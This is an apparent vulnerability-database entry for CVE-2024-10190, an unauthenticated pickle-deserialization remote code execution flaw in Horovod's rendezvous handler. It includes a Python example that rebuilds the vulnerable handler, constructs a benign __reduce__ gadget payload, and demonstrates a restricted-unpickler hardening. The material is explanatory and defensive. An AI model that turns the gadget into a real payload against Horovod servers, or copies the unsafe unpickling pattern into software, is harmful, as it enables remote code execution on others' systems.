CVE-2024-10190
Published: 2025-03-20
Priority: P266 · Severity: critical · CVSS 3.0 base score: 9.8
CVSS 3.0 vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS: 1.02% (59.1th percentile)
Horovod versions up to and including v0.28.1 are vulnerable to unauthenticated remote code execution. The vulnerability is due to improper handling of base64-encoded data in the `ElasticRendezvousHandler`, a subclass of `KVStoreHandler`. Specifically, the `_put_value` method in `ElasticRendezvousHandler` calls `codec.loads_base64(value)`, which eventually invokes `cloudpickle.loads(decoded)`. This allows an attacker to send a malicious pickle object via a PUT request, leading to arbitrary code execution on the server.
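The call chain described above (PUT body, base64 decode, pickle load) is the whole bug: any pickle stream can name a module-level callable and have it invoked during load. The block below is an added example written for this page, not Horovod's code. It reproduces the vulnerable pattern in a minimal handler, builds the kind of payload an attacker would send, and shows one hardening (an `Unpickler` whose `find_class` refuses every global lookup, which blocks `__reduce__` gadgets). Assumptions: stdlib `pickle` stands in for cloudpickle on the loading side; `VulnerableHandler`, `HardenedHandler`, `_DirGadget`, `loads_base64`, `safe_loads_base64` and `run_demo` are names chosen here, not project identifiers; the gadget calls `os.makedirs` instead of `os.system` so the side effect is benign and checkable.

```python
"""Added example (not Horovod's code): base64 + pickle on a PUT body is RCE.

Stdlib pickle stands in for cloudpickle here (assumption: arbitrary callables
named in the stream run during load in both). All class/function names below
are illustrative, not identifiers from the project.
"""
import base64
import io
import os
import pickle
import tempfile


def dumps_base64(obj):
    """Encodes an object the way a client of this pattern would."""
    return base64.b64encode(pickle.dumps(obj)).decode()


def loads_base64(value):
    """Vulnerable pattern: decode, then unpickle attacker-controlled bytes."""
    decoded = base64.b64decode(value)
    return pickle.loads(decoded)  # any __reduce__ callable in the stream runs here


class VulnerableHandler:
    """Mimics a key/value rendezvous handler whose PUT body is unpickled."""

    def __init__(self):
        self.store = {}

    def _put_value(self, key, value):
        self.store[key] = loads_base64(value)


class _DirGadget:
    """Attacker-side object: unpickling it calls os.makedirs(path).

    A real payload would point __reduce__ at os.system or subprocess.run;
    os.makedirs is used so the effect is benign and verifiable on disk.
    """

    def __init__(self, path):
        self.path = path

    def __reduce__(self):
        return (os.makedirs, (self.path,))


def build_payload(marker_dir):
    """Constructed PUT body: base64 of a pickle carrying the gadget."""
    return dumps_base64(_DirGadget(marker_dir))


class _NoGlobalsUnpickler(pickle.Unpickler):
    """Refuses to resolve any module.attr reference in the stream.

    Every __reduce__-based gadget needs a callable looked up by name, so
    rejecting find_class stops this payload class. Plain data (dicts, lists,
    strings, numbers) needs no global lookup and still loads.
    """

    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"refusing to load global {module}.{name}")


def safe_loads_base64(value):
    """Hardened variant: only pickle opcodes for plain data are accepted."""
    decoded = base64.b64decode(value)
    return _NoGlobalsUnpickler(io.BytesIO(decoded)).load()


class HardenedHandler(VulnerableHandler):
    def _put_value(self, key, value):
        self.store[key] = safe_loads_base64(value)


def demo(handler_cls, marker_dir):
    """One PUT-style call; returns (marker_dir_created, error_message)."""
    error = None
    try:
        handler_cls()._put_value("rank0", build_payload(marker_dir))
    except pickle.UnpicklingError as exc:
        error = str(exc)
    return os.path.isdir(marker_dir), error


def run_demo():
    """Runs both handlers against fresh temp paths and returns their results."""
    base = tempfile.mkdtemp()
    return {
        "vulnerable": demo(VulnerableHandler, os.path.join(base, "pwned_vuln")),
        "hardened": demo(HardenedHandler, os.path.join(base, "pwned_safe")),
    }


if __name__ == "__main__":
    for name, result in run_demo().items():
        print(f"{name}: marker created={result[0]}, error={result[1]}")
```

The restricted unpickler is a containment measure, not a substitute for the real fix: a rendezvous store that only ever needs strings, integers and small dicts should carry them as JSON (or another data-only format) and never unpickle a request body at all, since the gadget above runs before any key validation could happen.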
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| horovod | horovod | <= 0.28.1 | — |
| horovod | horovod | 0 – 0.28.1 | — |
| horovod | horovod_horovod | unspecified – latest | — |
OSV · 2025-03-20 · CRITICAL: Horovod Vulnerable to Command Injection (same description as above)
GHSA · 2025-03-20 · CRITICAL · CWE-502: Horovod Vulnerable to Command Injection (same description as above)
No detection rules found.
No public exploits indexed.
No writeups or analysis indexed.